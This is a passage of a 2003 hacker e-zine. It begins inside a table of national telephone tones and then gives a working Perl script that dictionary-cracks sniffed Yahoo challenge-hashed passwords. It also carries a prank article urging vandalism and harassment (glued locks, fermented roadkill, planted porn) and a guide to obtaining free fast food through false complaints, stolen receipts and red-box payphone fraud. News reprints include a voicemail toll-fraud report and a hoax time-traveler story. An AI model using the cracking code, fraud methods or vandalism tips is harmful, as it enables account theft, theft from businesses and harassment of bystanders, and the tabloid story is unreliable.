480+620 0.3 on 0.2 off Re-order tone - II (8) 480+620 0.2 on 0.3 off Waiting tone - 440 0.3 on 10.0 off Tunisia Busy tone - 425 0.25 on 0.25 off Congestion tone - 425 0.167 on 0.167 off Dial tone - 425 continuous Pay tone - 12000 0.125 on Ringing tone - 425 1.20 on 4.65 off Special information tone - 900/1400/1800(3x0.33 on 2x0.03 off) 1.0 off Call waiting tone - 425 0.2 on 0.6 off Turkmenistan Busy tone - 425 0.4 on 0.4 off Congestion tone - 425 0.4 on 0.4 off Dial tone - 425 continuous Second dial tone - 425 continuous Number unobtainable tone - 425 0.8 on 4.0 off Ringing tone - 25 0.4 on 4.0 off Route tone - 25 0.4 on 0.4 off Turks and Caicos Islands Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Recall dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Number unobtainable tone - 480+620 0.25 on 0.25 off Payphone recognition tone - 1600/1143 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 450 0.2 on 0.2 off 0.65 on 0.2 off Waiting tone - 440 1x(0.5 on 10.0 off 0.5 on) Turkey Busy tone - 450 0.5 on 0.5 off Confirmation tone - 450 0.04 on 0.04 off Congestion tone - 450 3x(0.2 on 0.2 off) 0.6 on 0.2 off Dial tone - 450 1.00 on 0.25 off Number unobtainable tone - 450 0.2 on 0.2 off Ringing tone - 450 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Warning tone - operator intervening 450 0.2 on 0.2 off 0.6 on 0.2 off Waiting tone - I 350+450 0.5 on 0.5 off Waiting tone - II 450 0.5 on 2.5 off Call waiting tone - 450 0.2 on 0.6 off 0.2 on 8.0 off Uruguay (Eastern Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - I 425 continuous Dial tone - II 450 0.7 on 0.8 off 0.2 on 0.3 off Negative indication tone - 425 0.5 on 0.5 off Positive indication tone - 425 2x(0.1 on 0.2 off) 0.1 on 1.3 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Warning tone - operator intervening 425 0.15 on 0.25 off 0.15 on 1.45 off Waiting tone - 425 0.2 on 0.2 off 0.2 on 4.4 off Vanuatu (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Pay tone - 1477/941 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 2x0.03 off 1.0 off Call waiting tone - 425 0.3 on 10.0 off Venezuela (Republic of) Busy tone - 425 0.5 on 0.5 off Confirmation tone - 425 0.1 on 0.1 off 0.3 on 0.1 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Howler tone - 1440 0.5 on 0.5 off Pay tone - 800 1.0 on 15.0 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1440/1800 3x0.33 on 1.0 off Call waiting tone - 400/450 0.3 on 6.0 off Caller waiting tone - 425 1.0 on 4.0 off British Virgin Islands Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Recall dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Number unobtainable tone - 480+620 0.25 on 0.25 off Payphone recognition tone - 1600/1143 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 450 0.2 on 0.2 off 0.65 on 0.2 off Call waiting tone - 440 1x(0.5 on 10.0 off 0.5 on) Wallis and Futuna (Territoire fran�ais d'outre-mer) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330 continuous Pay tone - 12000 0.1 on Ringing tone - 440 1.5 on 3.5 off Route tone - 440 0.05 on 0.05 off Special information tone - 950/1400/1800(3x0.3 on 2x0.03 off) 1.0 off Yugoslavia (Federal Republic of) Busy tone - I 425 0.5 on 0.5 off Busy tone - II 425 0.2 on 0.4 off Dial tone - 425 0.7 on 0.8 off 0.2 on 0.3 off Ringing tone - I 450x25 1.0 on 9.0 off Ringing tone - II 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Zambia (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Pay tone - 800 2.0 on Payphone recognition tone - 1600 0.1 on Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Call waiting tone - 425 0.1 on 4.9 off Zimbabwe (Republic of) Busy tone - 400 0.375 on 0.375 off Congestion tone - 425 0.167 on 0.167 off Dial tone - 425 continuous Pay tone - 1500+1000 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 450 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 523//659 1.5 on 1.5 off ******************************************************************************* 1 For PLMN/GSM. 2 This tone is used within the supplementary service 'Call Waiting' the duration is 30 seconds. 3 This tone is also used in private automatic branch exchanges (PABX). 4 This tone bursts every 15 seconds. 5 Analogue exchanges. 6 Two bursts, ten seconds apart. 7 Special dial tone is used when call transfer is active. 8 Trunk. 9 Until 1998/1999. ******************************************************************************* Explanation of symbols Frequency in Hz: f1�f2 f1 is modulated by f2 f1+f2 the juxtaposition of two frequencies f1 and f2 without modulation f1/f2 f1 is followed by f2 f1//f2 in some exchanges frequency f1 is used and in others frequency f2 is used. 04/13/03 EOF -- [ Perl Code for Security Auditing Yahoo E-mail Passwords ] #!/usr/bin/perl # # By: GrassMunk # # ||Info//Background|| # This program uses a dictionary file to crack sniffed yahoo passwords. # ( like those seen from Dsniff ) # # //Code from Yahoo login page # var passwd = form.passwd.value; # var hash1 = MD5(form.passwd.value); # var challenge = form[".challenge"].value; # var hash2 = MD5(form.passwd.value) + challenge; # var hash; # if(form.passwd.value){ # hash=MD5(hash2); # } # as you can see the above code is used to create a hash value for # your password so that its not sent plaintext over the internet. # This is great, but scince we want to know what the clear text # password is we use this program to calculate it. # # OK, next you may say "Why would i use this when MD5 Crack programs # exist?" Well smart ass ill tell you why, you see that extra "+ challenge" # up there, its adding a "nonce" (look it up) to add an extra level of # 'security'. What this means is that MD5 Crack won't work because it # doesnt use the nonce to crack the MD5 password. # # ||Usage|| # ./YahooPWD.pl -p -c -d # # ||Note|| # The dictionary file must have each individual word on a seperate line. # A good example are the files from: # http://www.mirrors.wiretapped.net/security/info/reference/wordlists/ # It will not work properlly if the words are all on one line and are # seperated by a coma, space etc. # # # ||DISCLAIMER|| # This program comes with NO guaruntee ( or spell checker ). You are # free to use it however you want but I don't guaruntee that it will # work forever. Infact it wouldn't take much on Yahoos' side to make # this script unusable. Also, if this script causes ANY harm to your # computer I can in no way be held responsible. Youve gotta be some # kind of stupid to be able to break your hardware with this little # script. But I cannot be blamed for anything you do so don't even # bother. # # use Digest::MD5 qw(md5_hex); use Term::ANSIColor; # This is used to add some colour. You dont like it? then add a # to this line and every line that begins with ' print color ' Theres alot of em :) use Getopt::Std; my $challenge; my $Password; my $guessword; my $counter=0; #Print Header print color 'bold yellow'; print "\n--\t $0 \t\t--\n--\tMaker:"; print color 'bold green'; print " GrassMunk\t"; print color 'bold yellow'; print "--\n"; #Print Usage if no arguments are supplied if (! defined $ARGV[0]) { print color 'bold blue'; print "\nUsage: "; print color 'bold yellow'; print "$0 "; print color 'bold red'; print "-p -c -d "; print " \n\n"; print color 'reset'; exit 0; } # get the options from the console getopts('c:p:d:'); $challenge = $opt_c; $Password = $opt_p; $dictionary = $opt_d; print "Using dictionary file: $dictionary\n"; open(DICTIONARY, $dictionary) || die("Could not open file $dictionary. Maybe the path is wrong or you do not have read permission. Error: $! \n"); while($guessword = ) { s/#.*//; # ignore comments by erasing them chomp($guessword); # remove newlines $digest = md5_hex($guessword); # Create digest $digest .= $challenge; # add the challenge to it $digest = md5_hex($digest); # re-Create it if($digest eq $Password) { print color 'bold red'; print "Password Found\n"; print color 'bold white'; print "The Password is: $guessword\n"; print "\n"; print color 'reset'; close(DICTIONARY); exit 0; } if(!($counter % 10000) ) { # Print the word on every 10 000th line print color 'bold green'; print "Word #$counter \t"; print color 'bold blue'; print "$digest"; print color 'bold green'; print " :: "; print color 'bold white'; print "$guessword\n"; } $counter++; } print "\n"; print color 'reset'; close(DICTIONARY); #EOF -- mike tyson cohosting jimmy kimmel ... its like watching a special olympics philosophy event -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-= ,)(8)). -=[ Fucking With Peoples Sensibilities ]=- (()))())()). (()"````"::= ) -- Part 1 "Introfuction" -- )| _ _ ::= ) (()(o)/ (o) ?(/) Author: caesium & Coercion )(::c ::.( :(/) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (( \ .__. ;,/(/) ) `.___,'/ (/) -=[ Intro ]=- | | (/) _.' ,\(/)__ You may say "fuck man, another stupid article", Well _.-" ` u (/) ". your 100% totally correct. However, this article is ," ^ \ sans-urine + coffee grinds.. Which is good.. (no / | offense phlux, closet article owned btw).. Please | . `. | read this before you rub one off to the hot ascii | /,' _ `.' _ `.| chick to the immediate left. (you know you want to). | || (o) | (o) || | |\ ; /) This article is going to discuss various ideas on ( \ `.,___,' `.,__,'/ how to fuck with peoples sensibilities such as their \ \ | | / ideals, time, ego, intellegence and most of all \ `; |/ their pride. `. / | jr Y | -=[ Example ]=- cj / ( | / ; Here is a real life example of fucking with someones / / sensibilities. Albiet a generic unoriginal method, ; ` . ,'( it is still however, fucking hularious! (keep in | \##' \ mind this is a TRUE example... ^_^) : Y \ \ \ \ Well, I was at a mall with a peep. We brought along \ \ \ a twonie and a thing of super glue (krazy glue). We \ \ \ proceeded to glue this coin to the floor. Holding the coin to the floor under my shoe for several minutes until I was satified that said coin was a new addition to what is the floor. Once that fucker was cemented to the floor, we retired to a near-by bench to sit, watch and enjoy our orange julius smoothies. We were soon not disapointed. Several people came by, spent a few minutes trying to pick it up, then kick it in a cheap attempt to get the coin unstuck. Some instantly knew it was a total fucking joke and looked around then left with some of their pride still intact. Others spent several minutes and one cheap fucker actually tryed to pry it off the floor with what looked like his car key. Eventually they all gave up. Except for this one pudgy motherfucker. This fucking sad excuse for a cheap human being spent ten long minutes doing everything in his power to pry this coin up, except use his fucking teeth. He soon left. Then, in total disbelief he returns like 15-20 minutes later just as we were about to leave, with a fucking hammer. Picture this, a fat kid, in a mall, with a hammer, smacking a glued down twonie. Well, he got his fucking twonie, at the cost of what was pride and common sense. And this kid was fucking 14 to 16.. It was indeed a sad moment for the human race. And was pretty damn funny at that. This is what its all about people. Making sensible people do unsensable things. Not to say that, that dumb fuck was in any way sensible to begin with. Anyhow, I digress. -=[ Ideas ]=- These ideas have been time tested and are true. They work.. (cept the cocktail) *Stickey things in unexpected places Vaseline behind a door handle of a shop or apartment lobby door can be quite the unexpected surprise to your neighbours or any other fucker you dont much appreciate. If it moves, GLUE IT.. Nothing pisses people off more than something which should move, but doesnt.. If its a lock, GLUE IT. If its a button, RUB SHIT ON IT. If you have a dog, YOU MUST WHIP IT. WHIP IT GOOD! *Disgusting porn in unexpected places Here's what I did once at a friends building. We printed off some she-male porn, yah know. Chicks with dicks.. Full page, Black and white and a color one before my buddies color ink ran out. We folded it up. And scattered it all about his apartment lobby. We then watched the lobby security cam via channel 74 on his cable (which provided more entertainment than I can possibly tell in even 2 k-1ine's). We saw some kids come by, pick it up, toss it to the ground and leave. Then we eventually saw some chienese guy pickup this disgusting shit, and then do what can only be described as appreciating the fine qualities of these penis toting biatches. His eyes then shifted from left to right, and so several times to ensure the coast was clear. This obviously indecates he knows damn well he is a suck motherfucker. Then he folded the print-out up and put it in his pocket. By this time, I have already soiled myself in what was the best laugh Ive had all damn month. *Ordering Pizza's to Rival Pizza Places One night coercion, grinthock and myself were rather bored and chillin out at grints place. We had a few drinks, so we were feeling pretty flexible. And we were looking for some mild entertainment. We then decided to lodge several prank calls to a popular pizza chain in Ontario. Then it occured to us to order a pizza from one pizza place to another rival pizza place. So, we got 2 pizza places and their respective addresses. We then called place A and ordered a pizza to be delivered to place B. After that, we called Place B and ordered a pizza to be delivered to place A. So, A will deliver to B and B to A. This may seem stupid now, however, when your 3/4 drunk this is indeed a very very fucking funny ass thing to do. Esp, when you call up 45 minutes later and demand to know where the fuck your pie is. And for shits and giggles. Launch this over your cell phone as your walking to the place to get a slice. Then you can watch it all go down while having dinner.. Talk about free entertainment. Be sure to block your number. But that goes without saying.. right?? *Good Old Dog Shit in a Purse! YES this is old. Yes this is soo fucking well known.. But damn, it works like 90% of the time. Its sooo fucking funny.. And everyones grandmother has atleast like 4 fucking purses laying around just waiting for your entertainment. If you cant find any dog shit. Well, grab a copy of k-1ine and go fill that fucker up. Or just use something equally disgusting. For ideas you can contact Phlux, he seems to have more than a few. We suggest filling the purse with useless items, like a compact you punked from your sister, some tissues (cause damn, old ladies fucking LOVE tissues) maybe some papers or something and maybe some chapstick. Insure that the items are ontop of the dog shit. So when hapless fucker looks inside, all he sees is whats expected from an old lady purse. That is until he reaches inside. *Coercions Road-Kill Bonanza Go around, collect some road-kill. Put this shit into a garbage bag. Remember to double bag this bag of dead kill. After some kill is collected fill the bag half way with water and let it ferment and permeate into a delicious broth of disgust. For your own personal protection set the bag in a can or rubbermaid container while its stewing to prevent unwanted rupture. If you can set this in direct sunlight, go for it. Be sure to aggitate this daily. Let this fucking shit stand for 4 days to a week. max. Then haul the bag to a place you dont much care for or wish to fuck-up. Then rip this fucker open as your ass is running like a motherfucker. Run far, run fast, and dont stop or look back.. Suggested ripping tool is a sharp object taped to a stick, do not run holding this, cause this fucking rank smell will follow your ass. *Fucking with Store Clerks Walking into a store and asking for weird things. Things which are gross. I mean, be creative. Here is what a friend of mine did once while we were at a mall. We noticed they were selling Habi-Trail. For those of you that dont know wtf Habi-Trail is, Its a bunch of these pipes and shit which you can connect to form elaborate yet cool pipe mazes for your hamster or rodent. In a passing comment, I mentioned they should make a Central Vacuum adapter for said Habi-Trail system (based on previous personal amusement). My friend decided to go into the store and ask for this non-existant accessory. So, he walks in, walks up to the counter and poses the million dollar question. The clerk stands there for a second thinking, as if she thought it was real. Then it suddenly occurs to her that hooking a Habi-Trail to a Central Vacuum system may not be in the best interests of your pet hamster. She was clearly an animal lover. This was made quite aparent in her recourse to said question. Needless to say, they did not have it in stock. -=[ Conclusion ]=- Fucking with peoples sensibilities can be a fun and a rewarding hobby, even if you are totally unoriginal. Its a great way to pass boring time with the peeps or what have you. People are not as smart as they seem. By shaking up things a bit, you can make normal people do some really stupid shit. This article shows a few examples in a sea of ideas on how to fuck with unsuspecting people. Hopefully by reading this article you will have learned a bit about sensibilities and why you should hold them in high regard. You dont want to be on the other end of the stick. If you see a purse on the side of the road. Keep walking. In fact, speed up. If you see a twonie on the ground and it doesnt respond to your shoe moving it. Then perhaps you should think nothing of it and continue on your way. Choose not to be the cheap fat kid. Choose not to be the victim of sensibilities. I plan to release more articles with stories and ideas in the future. Clone willing that is. Anyways, Try not to physically harm or otherwise cause excessive property damage. Dont be a complete asshole. Prove them stupid, have some jokes. But dont totally push in their sheesh. Regarding coercions cocktail. uughh.. (Keep in mind this was written over the phone at like 6am .. we were tired and somewhat fucked up.. ^_^) -=[ Credits ]=- Author: caesium Co-Author: Coercion Shouts: grinthock, Phlux, dec0de, Kris, theclone, and the fat cheap kid. -- Phrozen "I-know-I-fucked-up-so-shut-up" BloodFlame's Guide to Eating Free Ok, so those of you who read last month's issue of K-1ine may have noticed something I didn't. On the coupons that come from the change counting machines, it says something like "One AirMile per every 20 dollars" or some other bullshit like that. I fucked up. My bad. At best, this trick might work to get you AirMiles at a slightly faster rate than you normally would, at worst, it's a piece of shit. Once again, I fucked up. Sorry. This file is for informational purposes only, so if you decide to eat free by the means suggested in this file, and you get e. coli or some shit, or you get busted, or like, beaten to a bloody pulp by some burger flipping kid, it's your own damn fault. This one works tho... I ate for a couple of months like this. *reads disclaimer* Um... for research. Yeah. There are 2 ways to eat free, and both have their advantages and disadvantages. The first way is to go to the food bank. When I went, they didn't check up on me or anything they just took my word that I wasn't making enough money for food (which I wasn't at the time). After that I got food from them once every couple of months. Unfortunately, it wasn't nearly enough to last me a couple of months. The cool thing about the food bank, tho, is that if they give you something you don't like, they pretty much encourage you to bitch about it. Beggars can't be choosers? Fuck that. They give you bagels, and you prefer croissants? Tell them to give you the fucking croissants! It was great, cause you'd get enough food to last a few weeks (between 3 and 5), and it is all stuff you like. The disadvantage is that if you are merely hungry at 3 am, and don't have any coin, the food bank isn't open. What is an anarch to do? He is to go to McDonald's. If you go to McDonald's and order a number one, and they fuck it up somehow, i.e., it's cold, there's special sauce dripping out the side all over the place, it's not a number one at all... what do you do? Go back and bitch about it. Bitch till they rectify their mistake. With another number one combo. Yay! Here's the catch tho: in times past, one merely needed to say they ordered a number one at about noon yesterday. (How many Big Mac Combo meals do you think they sell at noon? I dunno, either, but it's a fuckin' lot!) Now, however, you need to give a call the same day, complaining about your order, or provide them with a receipt. Aww, don't have a receipt? No problem, look in the parking lot. If that little pimple farm behind the counter doesn't come out and clean the lot every few minutes there's litter all over the place. Since they either staple the receipt to the bag, or just shove it inside the bag, where the bag goes, the receipt goes. Look for one that's stapled. I don't recommend reaching into the bag... that can get gross. Another good way to get receipts is to steal them off the counter. Burger King and Taco Bell in particular like to put receipts on the counter. I have no idea why. All that matters is that they do. Grab two or three as you walk by. Just don't let anyone catch you, cause sometimes large football player types get pissed off when you steal their receipts. Personally, I'm a smoker, so I can't run very far. Just watch yourself. Don't feel like standing in the parking lot waiting for a receipt? Go to a payphone, whip out your red box, and call McDonald's. Tell them that you just got home from work, and that you stopped at McDonald's for lunch earlier, or on your way home, or whatever... Don't tell them your order was five number 7s and a diet coke. Keep it simple. Make it something you know they sold at the hour you are complaining about. Just happened to hear someone order a specific order that would feed you and your friends at the drive through? Sweet... wait fifteen minutes, and tell them they fucked up the order completely. Come back a couple of hours later, or whatever, and get your free food. You'll be on the "Manager's List", or "Customer's Log". Can't hear the drive through? Can't see what's on that fucking red screen? Ok, maybe you're sitting inside, and you happen to notice someone sitting down with his girlfriend or some shit, and they happen to be eating a number-who fucking cares. Looks good, doesn't it? Wait till they leave. Call in. Tell them they fucked your order. Thing is, sometimes they look it up on the 'puter they have there, and if they didn't sell it, you don't get your food. I don't know what they can do beyond telling you to get out, but that's cause I've never been there, cause I'm so damn good. If you act like a first timer, tho, like you didn't know you had to call in or keep your receipt, more often than not the chick behind the counter will tell you she can do this for you "Just this once..." but a lot of the times they are real fuckers over the "proof" that you bought the meal to begin with. One time, I ate one meal a day for a week at the same location without calls or receipts. Always a different manager. Choice. In my experience, Burger King employs only the dumbest mothercanuckers on the planet, and they are real sticklers for having a receipt. I tried a call in there the other day, and I was told that "I'm the night manager, so I don't know what happened today." I told her she was a moron and that what had happened today was a bunch of people came in, ordered food, and left. At least one left with cold food. Didn't help. Stupid fucking broad. Another time, the bitch sat there trying to figure out how to use the computer to check the order I suppo- sedly made. Kept asking me what time. I said I don't know the exact fucking time... it was between 12:10 and 12:30! After getting somewhat agitated, she finally gave me my food and let me leave. So yeah, if you do Burger King, be ready for the fucking third degree, and if you're starving, and you can't survive without a burger in the next five minutes, hold out for a McDonald's, cause getting Burger King to give you a fucking sandwich is like pulling teeth for them. "Can't let the poor people take our sandwiches! We might lose upwards of a hundred dollars a month!" Phht... this coming from a huge multinational conglomerate who makes billions a year. Fuck'em. They write that shit off anyways. Some of the things that help, when you are complaining: Make it seem like you were really put out (like, "I only get one break, and I couldn't very well come back to complain about it..." I dunno, some shit, make it seem really inconvenient for you. Complaining that you didn't get fries will more often than not get you an order of fries, NOT an entire meal. Complaining that you ordered a number one, and that you got a number seven works really well, since "fish makes me gag." Being upset, but not angry at the girl, cause she's just trying to do her job, and she only gets 7 an hour. She doesn't get paid enough to put up with your shit, and if you take out your anger on her, she will probably just tell you to get out. Unless she's really intimidated by you. Best to be upset but polite at the same time. One of my favourites is saying "I ordered a number one, and got a Big Extra. Yeah, I don't know if you've ever had a Big Extra hot, but they are disgusting. Yeah, mine was cold." And since everyone knows that Big Extras are the most disgusting burger on the planet, chix0r might even feel sorry for you for choking down this piece of shit, then take you out back and give you some skully. Probably not, but she's fat anyways, so fuckit. Don't forget to mix it up a little. Go to McDonald's today, Burger King tomorrow, then maybe Arby's (Don't knock it, that roast beef sandwich rawks!), then hit Taco Bell, and Wendy's. I don't recommend hitting Harvey's or any of those mom and pop burger joints, cause they mostly make your burger custom, and if it gets all fucked up cause you don't like onions, well, you shouldn't have told her to put onions on it. Don't show up to the same restaurant on the same day of the week at the same time every week. Remember, this is a workplace. The manager you encountered on Monday at 5 pm will more than likely be there next Monday at 5 pm. She WILL catch on if you are there every Monday at 5. Mix it up. And there you have it... my poor attempt at rectifying last month's embarrassment of a file... GO! Eat! Drink! Be Merry! Start a fire! Steal a car! Run over an old lady! Quit buggin' me about my last file! Phrozen BloodFlame Special pr0ps go out to Jelly and GothyDude DayLight Assassin for helping me to fine tune and hone my skillz, and for coming up with a few inventive ways of getting accurate orders and such. 04/13/03 -- [ K-1ine News Bytes ] "The Most Trusted Name In News" -- Wired News: "Voicemail Hackers Phone It In" 02:00 AM Apr. 17, 2003 PT http://www.wired.com/news/infostructure/0,1377,58517,00.html Voicemail passwords are being transformed into all-access backstage passes that allow malicious hackers to exploit voicemail systems, racking up huge charges on their unlucky victims' phone bills. Hackers are exploiting a combination of automated operator services from AT&T, voicemail services from SBC Communications and consumers who haven't changed their default voicemail passwords. Victims say that AT&T and SBC know about the scam and are taking no concrete action to protect consumers from it. But AT&T spokesman Gordon Diamond said that AT&T has been instrumental in stopping the scam. "AT&T has ambitious programs that use sophisticated technology to detect and deter phone scams and protect our customers," Diamond said. "We detected these scams, and we stopped them. But technological deterrents can't do the job alone, and consumers and businesses are responsible for ensuring the security of their phone lines." Here's how the scam works: The default passwords that SBC issues to new users of their voicemail services are in a specific format and are easily guessed. If the default password is not changed after the system is set up, it's ripe for exploitation by malicious hackers, who have been breaking into SBC voicemail systems and replacing the owners' recorded greetings with recordings of a voice saying "yes" at appropriate intervals. The hackers then place a collect call, typically from the Philippines or Saudi Arabia, to the hacked system at an odd hour, assuming that the voicemail system will pick up. AT&T uses an automated voice-recognition system when processing collect calls. The recording asks whether the party who is being called will accept the charges. When the hacked system responds "yes," the call is connected. Once connected, the hackers have been leaving the line open for hours -- and in some cases for days -- resulting in enormous bills for the victim. According to network security expert Mike Sweeney, there are a few reasons why the malicious hackers might leave the line open. "One is just to mind fuck with someone just because they can," said Sweeney. "But I also know that hackers will set up conference calls this way to discuss various 'business deals' at no cost to themselves. They might have set up the conference ... and just left the line up when they were done -- it's the victims' dime, so why bother stopping it?" K.C. Hatcher, a San Francisco graphic artist and one of the scam's casualties, has been billed $12,000 dollars for calls that both she and AT&T agree she didn't make. But she's expected to pay for those calls anyway, as are the other victims. In Hatcher's case, the scam was carried out on her business line on New Year's Eve. Hatcher said when she returned to the office after the holiday, she received a call from Bill Allen of AT&T Fraud Detection, who told her he thought she was the victim of telephone fraud. "I checked my outgoing message and discovered it had been altered, exactly as Mr. Allen said it would be," Hatcher said. "In a man's voice with a foreign accent the new message stated something like, 'Yes, yes, I will accept the charges, yes, yes, yes....'" Hatcher said Allen then issued her a case number to dispute the charges once she received her next phone bill. "He said that I probably would not have to pay the charges, as this type of incident happened quite often, and that AT&T often waived the charges." Later Hatcher was told that AT&T would take 35 percent off her bill, but she'd have to pay $8,000. Hatcher was not happy. "AT&T then suggested I 'go after' SBC, and SBC blames AT&T for holding the victim responsible for the crime," Hatcher said. "Basically, these two communications giants are pointing the finger at each other, and I'm caught in the middle with the bill to pay, or my credit will be ruined." Other victims of the scam had the same experience. "I got a call from AT&T's fraud division after Christmas, asking me to check my voicemail message," said Mary Runyon, a Texas-based photographer. "To my alarm, my outgoing message had been replaced with a message from some man with a thick accent saying 'yes uh uh ... yes ... uh uh ... sure.'" Runyon said that she was billed $7,256.34 for two calls; AT&T offered a 30 percent discount. When she refused, her account was turned over to a collection agency. "In the process of fighting this, I spoke to numerous people at AT&T and SBC. Not one sounded surprised when I told them about this scam," Runyon said. "I got the distinct impression that this scam is widespread and new victims are being exploited daily." AT&T's Diamond said the scam is not being widely perpetrated. "These are isolated incidents, and we do all we can to ensure the safety of our customers and our network. However, in these instances, there is no question that the customer is in the best position to ensure the security of their voicemail systems." SBC said in a statement that the company includes a written warning to all new customers advising them to change their default passwords immediately. Runyon and Hatcher acknowledge that they didn't change their default passwords. Both said they later discovered that the warning was included in a large package of information that appeared to reiterate the conversation they'd had with a sales rep when they set up their accounts. "I did not change my password because I was not expressly advised to do so," Hatcher said. "I hold both companies responsible for not going to adequate measures to alert their consumers to a very expensive problem so that we could at least try to protect ourselves from its occurrence." SBC's written warning isn't enough, agreed Linda Sherry, executive director of the San Francisco organization, Consumer Action. The company should have issued random default passwords that are not easily guessed, as it now does for new business accounts. Sherry also slammed AT&T for its automated system. "That AT&T would permit third-party phone charges based only on the authority of a recorded message is beyond belief," Sherry fumed. "Third-party billing should be allowed only when a real person answers the phone and is able to verify that they approve the charges." Diamond said AT&T has no plans to change the automated system, "which has proven to be extremely reliable for many, many years." MCI uses an automated system similar to AT&T's. Sprint uses live operators to process collect calls. Consumer Action is asking AT&T and SBC to reimburse the scam victims. -- 'TIME-TRAVELER' BUSTED FOR INSIDER TRADING Wednesday March 19, 2003 By CHAD KULTGEN http://tv.yahoo.com/news/wwn/20030319/104808600007.html NEW YORK -- Federal investigators have arrested an enigmatic Wall Street wiz on insider-trading charges -- and incredibly, he claims to be a time-traveler from the year 2256! Sources at the Security and Exchange Commission confirm that 44-year-old Andrew Carlssin offered the bizarre explanation for his uncanny success in the stock market after being led off in handcuffs on January 28. "We don't believe this guy's story -- he's either a lunatic or a pathological liar," says an SEC insider. "But the fact is, with an initial investment of only $800, in two weeks' time he had a portfolio valued at over $350 million. Every trade he made capitalized on unexpected business developments, which simply can't be pure luck. "The only way he could pull it off is with illegal inside information. He's going to sit in a jail cell on Rikers Island until he agrees to give up his sources." The past year of nose-diving stock prices has left most investors crying in their beer. So when Carlssin made a flurry of 126 high-risk trades and came out the winner every time, it raised the eyebrows of Wall Street watchdogs. "If a company's stock rose due to a merger or technological breakthrough that was supposed to be secret, Mr. Carlssin somehow knew about it in advance," says the SEC source close to the hush-hush, ongoing investigation. When investigators hauled Carlssin in for questioning, they got more than they bargained for: A mind- boggling four-hour confession. Carlssin declared that he had traveled back in time from over 200 years in the future, when it is common knowledge that our era experienced one of the worst stock plunges in history. Yet anyone armed with know- ledge of the handful of stocks destined to go through the roof could make a fortune. "It was just too tempting to resist," Carlssin allegedly said in his videotaped confession. "I had planned to make it look natural, you know, lose a little here and there so it doesn't look too perfect. But I just got caught in the moment." In a bid for leniency, Carlssin has reportedly offered to divulge "historical facts" such as the whereabouts of Osama Bin Laden and a cure for AIDS. All he wants is to be allowed to return to the future in his "time craft." However, he refuses to reveal the location of the machine or discuss how it works, supposedly out of fear the technology could "fall into the wrong hands." -- -- Credits Without the following contributions, this zine issue would be fairly delayed or not released. So thank you to the following people: CYB0RG/ASM, Caesium, Coercion, GrassMunk, Magma, MsO, Phlux, TiTaNiA, The Clone -- Shouts: CYB0RG/ASM, Wildman, H410g3n, warVamp, The Question, plappy, Phlux, rt, Magma, Hack Canada, The Grasshopper Unit, Flippersmack, soapie, Breanne, Flopik, dec0de, caesium, oz0n3, Kris, to2600.org, and lastly to everyone and anyone who contributes to the Canadian H/P scene. ;. .;.. ; ;. ;.. ;.. .;..; .;.; .;; ;.. .;..;. .;..; .;.;...; ;..;.. .;. A .;. .;. ;.. N E T T W E R K E D ;.. ;..;.. P R O D U C T ;..;.. .;..; ;..;.. ; .;..;.;.. .; . .;. ..;.. .;.. . .; ..;..;..;.. .; ;..;. .;.. . .;.. .;.;. ..;. ..;.. .;. ;.;..;;..;.; ;.;;..;.. ;.;.; .; . ;.;..;. .;. ;.;:.;. ,;....;. .;.;. .;.; .;.;.; .;.; ;..;. .;.;;.; .;. ..; ;. > > > *chew chew chew* Whatcha eatin'?